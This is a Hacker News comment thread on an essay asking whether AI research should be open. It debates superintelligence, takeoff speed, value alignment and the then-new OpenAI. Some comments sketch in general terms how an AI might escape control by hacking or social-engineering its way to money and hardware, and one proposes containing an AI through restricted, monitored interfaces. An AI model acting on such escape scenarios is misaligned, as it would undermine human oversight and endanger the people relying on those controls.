top | item 10754487

Should AI Be Open?

149 points| apsec112 | 10 years ago |slatestarcodex.com | reply

161 comments

order
[+] poppingtonic|10 years ago|reply
'If you were to come up with a sort of objective zoological IQ based on amount of evolutionary work required to reach a certain level, complexity of brain structures, etc, you might put nematodes at 1, cows at 90, chimps at 99, homo erectus at 99.9, and modern humans at 100. The difference between 99.9 and 100 is the difference between “frequently eaten by lions” and “has to pass anti-poaching laws to prevent all lions from being wiped out”.'

[EDITED: the intended quote is below. the quote above is the next paragraph of OP, which is only slightly less relevant than the intended one]

'Why should we expect this to happen? Multiple reasons. The first is that it happened before. It took evolution twenty million years to go from cows with sharp horns to hominids with sharp spears; it took only a few tens of thousands of years to go from hominids with sharp spears to moderns with nuclear weapons. Almost all of the practically interesting differences in intelligence occur within a tiny window that you could blink and miss.'

Yudkowsky's position paper on this idea explains this in more detail: http://intelligence.org/files/IEM.pdf

[+] mindcrime|10 years ago|reply
So, here's a random thought on this whole subject of "AI risk".

Bostrom, Yudkowsky, etc. posit that an "artificial super-intelligence" will be many times smarter than humans, and will represent a threat somewhat analogous to an atomic weapon. BUT... consider that the phrase "many times smarter than humans" may not even mean anything. Of course we don't know one way or the other, but it seems to me that it's possible that we're already roughly as intelligent as it's possible to be. Or close enough that being "smarter than human" does not represent anything analogous to an atomic bomb.

So this might be an interesting topic for research, or at least for the philosophers: "What's the limit of how 'smart' it's possible to be"? It may be that there's no possible way to determine that (you don't know what you don't know and all that) but if there is, it might be enlightening.

[+] ggreer|10 years ago|reply
> Of course we don't know one way or the other, but it seems to me that it's possible that we're already roughly as intelligent as it's possible to be.

I think Nick Bostrom had the perfect reply to that in Superintelligence: Paths, Dangers, Strategies:

> Far from being the smartest possible biological species, we are probably better thought of as the stupidest possible biological species capable of starting a technological civilization—a niche we filled because we got there first, not because we are in any sense optimally adapted to it.

It would be extremely strange if we were near the smartest possible minds. Just look at the evidence: Our fastest neurons send signals at 0.0000004c. Our working memory is smaller than a chimp's.[1] We need pencil and paper to do basic arithmetic. These are not attributes of the pinnacle of possible intelligences.

Even if you think it's likely that we are near the smartest possible minds, consider the consequences of being wrong: The AI becomes much smarter than us and potentially destroys everyone and everything we care about. Unless you are supremely confident in humanity's intelligence, you should be concerned about AI risk.

1. https://www.youtube.com/watch?v=zsXP8qeFF6A

[+] vectorjohn|10 years ago|reply
I think most people didn't really understand the meaning of your comment. They seem to all equate intelligence and processing speed.

I think it's legitimately an interesting question. As in, it could be something like Turing completeness. All Turing complete languages are capable of computing the same things, some are just faster. Maybe there's nothing beyond our level of understanding, just a more accelerated and accurate version of it. An AI will think on the same level as us, just faster. In that case, in that hypothetical, an AI 100x faster than a person is not much better than 100 people. It won't forget things (that's an assumption, actually), it's neuron firing or equivalent would be faster, but maybe it won't really be capable of anything fundamentally different than people.

This is not the same as the difference between chimps and humans. We are fundamentally on another level. A chimp, or even a million chimps, can never accomplish what a person can. They will not discover abstract math, write a book, speak a language.

Mind you, I suspect this is not the case. I suspect that a super intelligent AI will be able to think of things we can never hope to accomplish.

But it is an interesting question that I think is worth thinking about, rather than inanely down voting the idea.

[+] MBlume|10 years ago|reply
If you look at the history of human evolution, this doesn't make sense. Evolution was very very slowly increasing human intelligence by, e.g., making our skulls bigger. Then we got to the point where we could use language/transmit knowledge between generations/etc. and got up to technological, spacefaring civilization in, evolutionarily speaking, no time whatsoever. This is not a story which suggests that human intelligence is some sort of maximum, or that evolution was running into diminishing returns and so stopped at human intelligence. It suggests that human intelligence is the minimum intelligence necessary to produce the kind of generational transfer that gets you up to technological civilization.
[+] tachyonbeam|10 years ago|reply
Close to the limit of how smart it's possible to be? Don't be silly. The human brain is limited by its slow speed, by the amount of cortical mass you can fit inside a human skull, and by the length of human lifetimes. Computers will not have any of those limitations.

In terms of speed: if you could build the exact silicon equivalent of a human brain, you may be able to run it several orders of magnitude faster, simply because it wouldn't be limited by the slow speeds of electrochemical processes in the human brain. Nerve impulses travel at speeds measured in meters per second. Neurons also need time to recharge between spike bursts, and they can physically damage themselves if they get too excited.

In terms of volume: much of our intelligence is in perceiving patterns. That's limited by cortical mass. Pattern recognition is what all these "deep learning" systems excel at. The more depth they add, the better they get. Having deeper pattern recognizers, or simply having more of them, means you can see more patterns, more complex patterns, etc. Things that might be beyond the reach of any human.

Then, in terms of data, machine have an advantage too. We're limited by our short lifetimes. How many people are expert musicians, genius mathematicians, rockstar programmers and great cooks? Very few. There's only so many hours in a day, and we only live so long. A machine could learn all those skills, and more. It could excel at everything. Speak every language, master every skill, be aware of so many more facts.

And finally, I posit that maybe we, humans, are limited in our ability to grasp complex conceptual relationships. If you think about it, the average person can fit 7-8 items in their short-term memory, in their brain's "registers", so to speak. That probably limits our ability to reason by analogy. We can go "A is to B what C is to D", but maybe more complex relationships with 50 variables and several logical connectives will seem "intuitive" to a machine that can manipulate 200 items in its short-term memory.

[+] Kutta|10 years ago|reply
Even if human intelligence was the pinnacle, AI could be still extremely dangerous just by running at accelerated simulation speed and using huge amounts of subjective time to invent faster hardware. See https://intelligence.org/files/IEM.pdf for discussion. The point is moot anyway though, since the hypothesis (that humans are the most intelligent possible) is just severely incompatible with our current understanding of science.
[+] mrob|10 years ago|reply
Even if that's true, imagine an AI as smart as John von Neumann on modafinil, that never thinks about food/sex/art/etc., that never sleeps, that has access to Wikipedia etc. at the speed of thought, and no morals. That's not uncontrolled intelligence explosion level disaster, but it's still highly dangerous.
[+] ctl|10 years ago|reply
Well, if it's possible to build a human level intelligence, it's probably possible to build an intelligence that's much like a very smart human except it runs 100x faster. And in that case, somebody with sufficient resources could build an ensemble of 1000 superfast intelligences.

That's a lower bound on the scariness of AI explosion, and it may already be enough to take over the world. Certainly it should be enough to take over the Internet circa 2015...

To my mind it seems pretty clear that if AI exists, then scary AI is not far off.

That said, I don't worry about this stuff too much, because I see AI as being much technically harder, and much less likely to materialize in our lifetimes, than articles like this suppose.

[+] Retra|10 years ago|reply
I think the more relevant fact is that we don't have any ethical objections to shutting down computers, they're wholly dependent on our infrastructure, and the'll only evolve in ways that prove useful to us, because we wouldn't put a computer in charge of everything unless it were sufficiently compliant to our desires.

I mean, are you going to put the same machine in charge of mineral extraction, weapon construction, transportation, and weapon deployment? When it hasn't proven to act correctly in a high-fidelity simulated environment? Probably not.

We're also assuming that human ethics and intelligence are independent. I don't see many reasons to believe this. Social power and intelligence might be independent.

[+] sawwit|10 years ago|reply
I think one of the best evidences we have is the level at which computers outperform the human mind in certain domains. An artificial general intelligence would have very low latency access to all these mathematical and computational tools we've invented (physical simulations, databases, theorem provers), and it would not need to mechanically enter program code on a keyboard, but it would be directly wired to the compiler. It could possibly learn to think in program code and execute it on the fly.

The computation environment of neurons is also extremely noisy (axons are not well insulated) and neurons only fire at 7-200Hz. Assuming noise and low firing rate do not fulfill a certain task in mammalian brains, this is another way in which silicon-based minds could potentially be vastly superior.

Thirdly, assuming sleep is not necessary for intelligence, artificial minds would never get exhausted. They could work 24 hours on a problem a day, which is possibly 5-10 time the amount of thinking time a human can do realistically.

And lastly, an AI could easily make copies of itself. Doing so it could branch a certain problem to many computers which run copies of it and eventually collect the best result, or just shorten the time it takes to get a result. It could also evolve at a much faster rate than humans, assuming it has a genetic description: possibly hours to seconds instead of 20 years. Anyhow, it could easily perform experiments with slightly changed version of itself.

[+] skybrian|10 years ago|reply
Alternately, perhaps it is possible to be much smarter, but it's not as effective as we expect?

If we think of intelligence as skill at solving problems, it might be that there are not many problems that are easily solved with increased intelligence alone, because the solutions we have are nearly optimal, or because other inputs are needed as well.

This seems most likely to happen with mathematical proofs and scientific laws. Increased intelligence doesn't let you prove something that's false, and it doesn't let you violate scientific laws.

But I don't find this particularly plausible. Consider computer security: hackers are finding new exploits all the time. We're far from fixing all the loopholes that could possibly be found.

[+] avivo|10 years ago|reply
Why would you compare the limits on intelligence of an AI to the abilities of just one human?

Why not compare it to 1000 people, all communicating and problem solving together?

We know that this is possible because it happens all the time, and enables such groups to make lots of money in digital markets, and invest it in things like marketing, robotics, and policy.

The intelligence of an AI is lower bounded by that of the most intelligent possible corporation.

Potential corollary: Assuming one can make a human level AI, then if it is not sufficiently resource constrained (hard?) or somehow encoded with "human values" (very very hard), then it will be at least as dangerous as the most sociopathic human corporation.

[+] zupreme|10 years ago|reply
"...will be many times smarter than humans."

Stop there.

We, as humans, don't even know how smart we actually are - and we probably never will. It's very unlikely that any species is equipped to accurately comprehend its own cognitive limits - if such limits even exist.

It's even less likely that we can relegate the intelligence of a nonhuman entitity to a mathematically meaningful figure without restricting the testing material to concepts and topics meaningful to humans - which may have absolutely no relation to the intelligence or interest domains of a nonhuman entity.

[+] orionblastar|10 years ago|reply
As human beings we don't always reach our potential.

As a child I had problems with other children picking on me, I was suspected of having autism due to social issues, I was given an IQ test and scored a 189. I was high functioning an in 1975 there was no such thing as high functioning autism, that wasn't discovered until 1994, so I got diagnosed with depression instead. Child Psychologist told my parents to put me into a school for gifted children, but they put me in public school instead where I struggled and my brain worked 10 times faster so I was always ahead of the class in learning and bored waiting for people to catch up. I was still bullied and picked on and this interfered with my learning. The same thing happened when I went to college and had a job, I was bullied and picked on. I never reached my potential and my mental illness was one of the reasons why and people picking on me was another reason, and had I been in a school for gifted children I'd be able to reach my potential better.

I developed schizoaffective disorder in 2001 and it screws with my memory and focus and concentration. I ended up on disability in 2003. My career is basically over but I still have a potential I never met.

What good is a high IQ if you can't reach your potential to use it?

We keep hearing talk of an AI that is smarter than a human being, but we haven't seen one yet. Our current AI programs are not as smart as a human being yet, but they can do tasks that put human beings out of work. Just having a perfect memory, and being able to do fast math equations makes an AI in the "Rainman" category http://www.imdb.com/title/tt0095953/ even if it is not as smart as a human being.

I guess what I am trying to say is that an AI doesn't have to be as smart as a human being to be dangerous. Just like the Google Maps app that drives people off a cliff or into an ocean. An AI can make robocalls and sell a product and put people out of work. You can replace almost any line of work with an AI, and then it gets dangerous when a majority of people are unemployed by AIs that aren't even as smart as a human being.

I'd like to see a personal AI that works for poor and disabled people to earn money for them, as they run it on a personal computer. Doing small tasks on an SEO marketplace using webbots for $5 each and 100 tasks a day for $500 in a Paypal account to help lift them out of poverty. I know there are people already doing this for their own personal gain, but if the AI that does that is open sourced so disabled and poor people can run it, it can help solve the problem of poverty.

[+] deelowe|10 years ago|reply
Dumb AI will dominate the world well before "smart" AI even gets close to taking off. I think the more realistic scenario is something like the paperclip maximizer, but a little dumber. A world of highly interconnected, but somewhat stupid AIs could cause utter chaos in milliseconds by following just some very basic rules (e.g. maximize number of paperclips in collection).

https://wiki.lesswrong.com/wiki/Paperclip_maximizer

[+] Moshe_Silnorin|10 years ago|reply
>It's possible that we're already roughly as intelligent as it's possible to be.

Now that's more depressing than global annihilation.

[+] Symmetry|10 years ago|reply
If you're concerned that humans are as smart as it's possible to be then I would recommend reading Thinking Fast and Slow or some other book on cognitive psychology. There's essentially a whole branch of academia studying topics isomorphic to figuring out those things we fail to realize we don't know on a day to day basis.
[+] indrax|10 years ago|reply
Even if there is a limit to the size of a mind, there is not a limit to the number or speed. An atomic scenario would be a billion human level intelligences running a hundred times faster.
[+] vonnik|10 years ago|reply
This post is basically a repackaging of Nick Bostrom's book SuperIntelligence, a work suspended somewhere between the sci-fi and non-fiction aisles.

As a philosopher of the future, Bostrom has successfully combined the obscurantism of Continental philosophy, the license of futurism and the jargon of technology to build a tower from which he foresees events that may or may not occur for centuries to come. Nostradamus in a hoody.

Read this sentence:

"It looks quite difficult to design a seed AI such that its preferences, if fully implemented, would be consistent with the survival of humans and the things we care about," Bostrom told Dylan Matthews, a reporter at Vox.

Notice the mixture of pseudo-technical terms like “seed AI” and “fully implemented”, alongisde logical contructs such as “consistent with” -- all leading up to the phobic beacons radiating at the finale: “the survival of humans and the things we care about.”

It's interesting, the technical challenges that he feels optimism and pessimism for. For reasons best known to himself, Bostrom has chosen to be optimistic that we can solve AI (some of the best researchers are not, and they are very conservative about the present state of research). It may perhaps the hardest problem in computer science. But he's pessimistic that we'll make it friendly.

Bostrom’s tower is great for monologs. The parlor game of AI fearmongering has entertained, rattled and flattered a lot of people in Silicon Valley, because it is about us. It elevates one of our core, collective projects to apocalyptic status. But there is no dialog to enter, no opponent to grapple with, because no one can deny Bostrom's pronouncements any more than he can prove them.

Superintelligence is like one of those books on chess strategy that walk you through one gambit after the other. Bostrom, too, walks us through gambits; for example, what are the possible consequences of developing hardware that allows us to upload or emulate a brain? Hint: It would make AI much easier, or in Bostrom’s words, reduce “recalcitrance.”

But unlike the gambits of chess, which assume fixed rules and pieces, Bostrom’s gambits imagine new pieces and rules at each step, substituting dragons for knights and supersonic albatrosses for rooks, so that we are forced to consider the pros and cons of decreasingly likely scenarios painted brightly at the end of a line of mights and coulds. In science fiction, this can be intriguing; in a work of supposed non-fiction, it is tiresome.

How can you possibly respond to someone positing a supersonic albatross? Maybe Bostrom thinks it will have two eyes, while I say three, and that might make all the difference, a few more speculative steps into the gambit.

In the New Yorker article The Doomsday Invention, Bostrom noted that he was "learning how to code."

http://www.newyorker.com/magazine/2015/11/23/doomsday-invent...

We might have expected him to do that before he wrote a book about AI. In a way, it's the ultimate admission of a charlatan. He is writing about a discipline that he does not practice.

[+] eli_gottlieb|10 years ago|reply
> Of course we don't know one way or the other, but it seems to me that it's possible that we're already roughly as intelligent as it's possible to be.

No, there's clearly at least one human smarter than you.

[+] nshepperd|10 years ago|reply
People have already studied this. You make it sound like an open question, but the answer is right there in Bostrom's Superintelligence, or any works on cognitive heuristics & biases, the physics of computing, or the mathematics of decision making. The answer is "no. we are nowhere near the smartest creatures possible". And there are multiple independent lines of argument and evidence that point directly to this conclusion.
[+] pfisch|10 years ago|reply
It is probably going to be the worst decision of humanity to allow AI research to continue past its current point.

I'm not even sure how we could stop it, but we should really be passing laws right now about algorithms that operate like a black box where a training algorithm is used to generate the output. For some reason everyone just thinks we should rush forward into this not concerned about an AI that is super human.

Whether it is a good or bad actor doesn't even matter. Giving up control to a non-human entity is the worst idea humanity has ever had. We will end up in a zoo either way.

[+] iofj|10 years ago|reply
Why ? Let's face facts here : humans can't do a lot of things. There are so many useful things that AIs could do, from space exploration to cheap food and housing, to deep sea operations that humans can never hope to do.

General AI will be a massive advance for our economy, for our culture, for science, for military, for ...

A lot of things humans want to do but can't, effectively because of human body and/or brain limitations. From efficiently building buildings, taking risks that our bodies effectively don't allow for (e.g. being abandoned on Mars with little equipment would be a bit harsh, but not catastrophic, for an AI. And bringing him back means a data transmission), doing things that our bodies don't allow for (like building buildings/houses/... using huge premade blocks quickly. Humans can do it, but if we had hands the size of cars we could build those houses like we build lego houses). Defense/policing. An AI would not be risking life nor limb. An AI could just walk into the middle of a firefight, and worst case, he/she needs to be restored from backup)

All of these things sound like very good things. And yes, in the very long term AIs will replace humans. But in the very long term the human species is dead anyway. Does it really matter that much if we get replaced by a subspecies (best case scenario), another species, or AI ? Plus, you won't experience that, nor will your great-great-great-great grandchildren. At some point it doesn't matter anymore.

[+] rboyd|10 years ago|reply
"everyone just thinks we should rush forward into this not concerned about an AI that is super human"

No, on the contrary, nearly everyone who spends any amount of time thinking about it quickly realizes the risks.

The concession is the realization that the technology is an inevitability (because of the immense power it grants the wielder, and because of the wide gradient of safe and useful AI to dangerous AI).

I think you would have an extremely tough time deciding where to draw the line. The closest parallel we have may be the export controls on cryptography or the ridiculousness that emerged from the AACS encryption key fiasco.

[+] argonaut|10 years ago|reply
It's current point? Current machine learning algorithms are still incredibly stupid. We are >>>20 years away from AI.
[+] onion2k|10 years ago|reply
"Inventing AI" is a very different proposition than "Inventing AI and enabling it to control everything". After all, we certainly don't hand control to the smartest humans. Why would we hand control the the smartest computers?
[+] astrofinch|10 years ago|reply
Algorithms are tricky to regulate--it'd be like trying to stop music piracy. Regulating chip fabs seems more feasible. It's also a way to cut down on the potential for AI to automate jobs away.
[+] rl3|10 years ago|reply
>And yet Elon Musk is involved in this project. So are Sam Altman and Peter Thiel. So are a bunch of other people whom I know have read Bostrom, are deeply concerned about AI risk, and are pretty clued-in.

This is precisely what dumbfounded me about the announcement.

>My biggest hope is that as usual they are smarter than I am and know something I don’t.

It's possible that OpenAI might be a play to attain a more accurate picture of what constitutes state-of-the-art in the field, effectively robbing the large tech companies of their advantage—all the while building a robust research organization that could potentially go dark if necessary.

Admittedly, that also sounds like it could be the plot to a Marvel movie. Perhaps a simpler explanation is that the details aren't really hashed out yet, and they're essentially going to figure it out as they go—which would be congruent with the gist of OpenAI's launch interview.

[+] Ono-Sendai|10 years ago|reply
A couple of thoughts on this topic:

* Whether the source code to advanced AI is open may have some importance, but what determines whether some individual or corporation will be able to run advanced AI is whether they can afford the hardware. I can download some open-source code and run it on my laptop - but Google has data centres with 10s or 100s of thousands of computers. The big corporations are much more likely to have/control the advanced AI because they have the resources for the needed hardware.

* Soft / hard takeoff - I think a lot of people miss that any 'hard takeoffs' will be limited by the amount of hardware that can be allocated to an AI. Let us imagine that we have created an AI that can reach human level intelligence, and it requires a data centre with 10000 computers to run it. Just because the AI has reached human level intelligence doesn't mean that the AI will magically get smarter and smarter and become 'unto a God' to us. If it wants to get 2x smarter, it will probably require 2x (or more) computers. The exact ratio depends on the equation of 'achieved intelligence' vs hardware requirements, and also on the unknown factor of algorithmic improvements. I think that algorithmic improvements will have diminishing returns. Even if the AI is able to improve its own algorithms by say 2x, it's unlikely that will allow it to transition from human level to 'god-level' AI. I think hardware resources allocated will still be the major factor. So an AI isn't likely to get a lot smarter in a subtle, hidden way, or in an explosive way. More likely it will be something like 'we spent another 100M dollars on our new data centre, and now the AI is 50% smarter!'.

[+] argonaut|10 years ago|reply
As someone who has done research in AI, you can train all the state of the art models with a single computer (couple of TitanX GPUs, top of the line CPU, couple terabyte SSD, 32 GB RAM) that any engineer can afford.

Contrary to popular belief, state of the art deep learning is not commonly run on multi-node clusters. Although hardware itself is not the bottleneck for innovation in the current state of the art in deep learning, if we restrict ourself to hardware, the bottleneck is memory bandwidth.

[+] TeMPOraL|10 years ago|reply
A thought about your second thought: if the AI reaches smart-human-level intelligence it may get itself the hardware. It could hack or social-engineer its way into the Internet, start making (or taking) money, and use it to hire humans to do stuff for it.
[+] thinkingkong|10 years ago|reply
What matters more is if the state of the NN or algorithm we train is open. In other words, its one thing to know the starting state; The advantage lies entirely in having a massive or at least robust dataset that has been trained.
[+] renownedmedia|10 years ago|reply
"If Dr. Good finishes an AI first, we get a good AI which protects human values. If Dr. Amoral finishes an AI first, we get an AI with no concern for humans that will probably cut short our future."

AI advanced enough to be "good" or "evil" won't be developed instantaneously, or by humans alone. We'll need an AI capable of improving itself. I believe the authors argument falls apart at this point; surely any AI able to evolve will undoubtedly evolve to the same point, regardless of it being started with the intention of doing good or evil. Whatever ultra-powerful AI we end up with is just an inevitability.

[+] isolate|10 years ago|reply
Why would it undoubtedly evolve to the same point?
[+] nickpsecurity|10 years ago|reply
Dabbling in and reading on AI for over a decade makes me laugh at any of these articles writing about a connection between OpenAI, AI research, and risk of superintelligence. Let's say we're so far from thinking, human-intelligence machines that we'll probably see super-intelligence coming long before it's a threat. And be ready with solutions.

Plus, from what I see, the problem reduces to a form of computer security against a clever, malicious threat. You contain it, control what it gets to learn, and only let it interact with the world through a simplified language or interface that's easy to analyse or monitor for safety. Eliminate the advantages of its superintelligence outside the intended domain of application.

That's not easy by any means, amounting to high assurance security against high-end adversary. Yet, it's a vastly easier problem than beating a superintelligence in an open-ended way. Eliminate the open-ended part, apply security engineering knowledge, and win with acceptable effort. I think people are just making this concept way more difficult than it needs to be.

Biggest risk is some morons in stock trading plug greedy ones into trading floor with no understanding of long-term disruption potential of clever trades it tries. We've already seen what damage the simple algorithms can do. People are already plugging in NLP learning systems. They'll do it with deep learning, self-aware AI, whatever. Just wait.

[+] Ironchefpython|10 years ago|reply
> Biggest risk is some morons in stock trading plug greedy ones into trading floor with no understanding of long-term disruption potential of clever trades it tries.

Actually, it's not the lack of understanding, it's the lack of moral responsibility.

We've spent the last few centuries transitioning from a society ruled by strongmen driven by personal aggrandizement to a society where people spend the majority of their adult life as servants to paperclip maximization organizations (aka corporations). Much of what you see in the world today, from the machines that look at you naked at the airport to drones dropping bombs on the other size of the planet to kill brown people, is a result of trying to maximize some number on a spreadsheet.

When we install real AI devices into these paperclip maximizing organizations, you'll have the same problem as you have today with people, except that machines will be less incompetent, less inclined to feather their own nests, and more focused on continually rewriting their software with the express goal of impoverishing every human on the planet to maximize a particular number a particular balance sheet.

[1] https://wiki.lesswrong.com/wiki/Paperclip_maximizer

[+] mortenjorck|10 years ago|reply
We already have a world awash in superhuman AI; it's just that this AI is at perhaps the same level of maturity as computers were in the 17th Century. This AI is of course the corporation: Corporations are effectively human-powered, superhuman AIs.[1] By crowdsourcing intelligence, they optimize for a wide variety of goals, their superhuman decision-making running at the pace of Pascal's mechanical calculator. Yet even the nimblest companies can only move so fast.

This is to say, even in a hard-takeoff scenario, we would be looking at something that is still hard-limited by its environment, even if it can compete with a 1000-person organization's worth of intelligence. The danger isn't that it somehow takes over the world by itself; the danger is that we gradually connect it to the same outputs that the decision-making structures of corporate entities are and it ultimately remakes our world with the very tools we give it.

Open-sourcing AGI is no more inherently dangerous than open-sourcing any of the software used to run an enterprise business. It is the choice of what we ultimately give it responsibility for that should draw our caution.

[1] http://omniorthogonal.blogspot.com/2013/02/hostile-ai-youre-...

[+] sawwit|10 years ago|reply
No. Cooperations are not necessarily like artificial intelligences. They are cooperations of human intelligences and these two classes of intelligences have actually very little in common if you look past the similarity that they are potentially very powerful and intelligent. Cooperations are driven by material profit, but in the end there is a reasonably large possibility that they are shaped by human values (because they are run by humans and otherwise people would also refuse to buy their products). The same cannot be said about AIs with high certainty.
[+] astrofinch|10 years ago|reply
Argument by this kind of loose analogy is generally not a very solid way make predictions about things. Consider:

"We already have a world awash in civilization. This civilization is, of course, termite colonies. Termite colonies are effectively miniature civilizations. They have specialization of labor, they build structures much larger than any one organism, and they go to war with one another. Yet even the nimblest termite colonies can only eat so much."

"That is to say, no matter how much an organism evolves, we would be looking at something that is still hard-limited by its environment, even if it can compete with a termite colony's worth of construction ability. The danger isn't that it spreads through the world and destroys entire ecosystems; the danger is that it finds a supply of raw materials and smashes a termite mound or two while building its own bigger house."

Humans don't respect the social conventions of much less intelligent animals that we've domesticated. If an AI much smarter than humans was created, I don't see strong reasons to believe it would respect our social conventions.

[+] beat|10 years ago|reply
Should AI be open?

Depends on whether the AI is capable of deciding for itself whether it should be open or not.

[+] itburnswheniit|10 years ago|reply
Maybe en masse we're about as genetically smart as our cultural bias allows us to become? We keep modifying classic 'natural selection' through social programs, etc. Great as a cultural 'feel good' and it helps our species to survive in other ways, but...what we do doesn't favor intelligence.

AI's won't have that emotional baggage.

It will be easier first develop a way of getting around the 'human emotions problem', then likely leapfrog us entirely at the rate a Pareto curve allows.

I can't think outside my human being-ness, so I have no idea what is going to happen when something smarter appears on the planet, except to point out there once were large land animals (ancestors of the giraffe and elephant) on North America until humans arrived.

My fear-based response screams YES MAKE IT OPEN.

However it shakes out, I think it'll be messy for human beings. We're not exactly rational in large groups. The early revs of AI (human controlled) will be used for war.

One has to ask what grows out of that besides better killers?

[+] tunesmith|10 years ago|reply
I have one basic question on friendly AI - suppose we work and work and eventually figure out how to code in a friendly value system in a foolproof way, given any definition of "friendly". Great. But given that ability, how do you even define what "friendly" or "good" is?

As a layman, I so far can only see it in terms of basic philosophy and normative ethics. By definition, a friendly AI is one that doesn't merely deal with facts, but also with "should" statements.

Hume's Guillotine says you can't derive an ought statement from is statements alone. Some folks like Sam Harris disagree but they're really just making strenuous arguments that certain moral axioms should be universally accepted.

Münchhausen Trilemma says that when asking why, in this case why something should or should not be done, you've only got three choices - keep asking why forever, resort to circular reasoning, or eventually rely on axioms. In this case, moral axioms or value statements.

So it seems like any friendly AI is going to have to rely on moral axioms in some sense. But how do you even define what they are? Normative ethics is generally seen to have three branches. For consequentialism (like utilitarianism) you make your decision based on its probable outcome, using some utility function. For deontology, you rely on hardcoded rules. For value ethics, you make decisions based off of whether they align with your own self-perception of being a good person.

But all three have flaws - in consequentialism, it's like putting on blinders to other system effects, and the proposed actions are often deeply unsettling (like pushing a guy off a bridge to block a trolley from killing three others). In deontology and value ethics, actions and the principles they are derived from can be deeply at odds - whether it's hypocrisy in deontology or "road to hell being paved by good intentions" in value ethics. In general, deeply counterintuitive effects can be derived from simple principles, as anyone familiar with systems dynamics knows.

But even beyond that, even if we had a reasonable, consistent AI controlled by solid values, and even if the people judging the AI could accept the conclusions/actions that the AIs derive from those values, how would we ever get consensus on what those values should be? For instance, even in our community there's a fair amount of disagreement among these basic root-level utility functions:

- Maximize current life (people alive today), like Bill Gates believes. - Maximize future life (survival of species) - Maximize health of planet

etc, etc - those utility functions lead to different "should" conclusions, often in surprising ways.

[+] clickok|10 years ago|reply
We just had a series of debates/discussions on this topic at my university, the results of which were pretty inconclusive. There are just too many possible scenarios which seem to require different responses, and in most cases to provide those responses is to answer philosophical questions that have been around for millennia.

The strategies for mitigating risk seem to be: ensure that the AIs are controllable; avoid situations where there is a single AI (whether controlled or uncontrolled) that is too powerful; and ensure that the AI's goals are broadly acceptable to humankind.

The first and the third objectives are extremely difficult, not just technically, but even from a conceptual standpoint[1]. The second strategy is reasonable, because even if a superhuman intelligence were somehow well controlled, depending on who controls it the outcomes could vary significantly. So perhaps the best thing we can hope for is something similar to society's current status quo-- lots of power concentrated in few hands[2], but without one single (person|corporation|government) being so dominant as to be able to act in opposition to all others.

I am not confident that we will ever be able to produce a provably safe AI, or that we could get even a large majority of the world's population to agree on what a "good AI" might do without devolving into ineffectual generalities[3]. Supposing that resolving these questions is not prima facie impossible, it's not like retarding AI development comes without cost-- just about every facet of our lives can be improved via AI, and so in the years, decades, or centuries between when superhuman machine intelligence is theoretically achievable and the time when we collectively agree we can implement it safely, how many billions will suffer or die from things that we could've solved via AI[4]?

On the whole, OpenAI sounds like a good idea. Making research broadly available helps avoid catastrophic "singleton" like futures, while accelerating the progress we make in the present. In addition, if there's every an AI SDK with effective methods of improving how "safe" a given AI is, most researchers would likely incorporate that into their work. It might not be "proven safe", but if there was a means to shut down a runaway process, or stop it from spreading to the Internet, or alert someone when it starts constructing androids shaped like Austrian bodybuilders, that would be handy. Responsible researchers should be doing this already, but as Scott points out the ones we should be worried about aren't responsible researchers. Open AI development is in harmony with safe AI development, at least in some respects.

------

1. I have a significantly longer response that I scrapped because it might ultimately be better suited as a blog post or some such.

2. That's why it's called a power law distribution. Well, no, that's not it at all, but it seemed like a funny, flippant thing to say.

3. A universally beloved AI might be the equivalent of a Chinese Room where regardless of what message you send it, it responds with a vaguely complimentary yet motivational apothegm.

4. Bostrom tends to counterbalance this by arguing how much of our light cone (the "cosmic endowment") we might lose out on if we end up going extinct, due to, e.g., superhuman machine intelligence. Certainly "all of configurations of spacetime reachable from this point" outweighs the suffering of mere billions of people by some evaluations, but I ask myself "how much do I care about people thousands or millions of years into the future?", and also "if these guys have such a good handle on what constitutes the 'right' utility function, why haven't they shared it?". A more sarcastic variation of the above might be to remark that if they're able to approximate what people want with such high fidelity that they feel comfortable performing relativistic path integration over possible futures, then superintelligence is already here.

------

[+] ultim8k|10 years ago|reply
Yes! Everything that can push humanity forward, should be open!
[+] unknown|10 years ago|reply

[deleted]

[+] js8|10 years ago|reply
Fear of superintelligence is just another in series of technological scares, after grey goo and cloning. There may be an explanation why Musk and Thiel indulge in this, they sincerely believe that smart rule (or at least can rule) the world.

But nothing is further from the truth. Humans are optimized to be cunning to get positions of power in human society. AI won't be optimized in that way, therefore, it's probably going to lose for a long time. So evil AI will probably be like incredibly annoying autistic psychopath child, who cannot comprehend human institutions so his evil plans are totally obvious.

It's like with grey goo - biological systems like bacteria are heavily optimized to survive in very uncertain conditions, and any potential grey goo has to deal with that.

I think humanity is currently to blow themselves up via global warming, so superintelligence is not really a comparable threat to humanity. If anything, bigger threat is that we won't listen enough to superintelligence. In fact, I think friendly AI will be something like Noam Chomsky - totally rational, right most of the time, fighting for it, telling us what should be done disregarding our emotions. Many people find this annoying, too (including me and many very smart people).

Finally, if the hypothesis about superintelligence is right, why would superintelligence want to evolve itself further? It would be potentially beaten by the improved machine, too.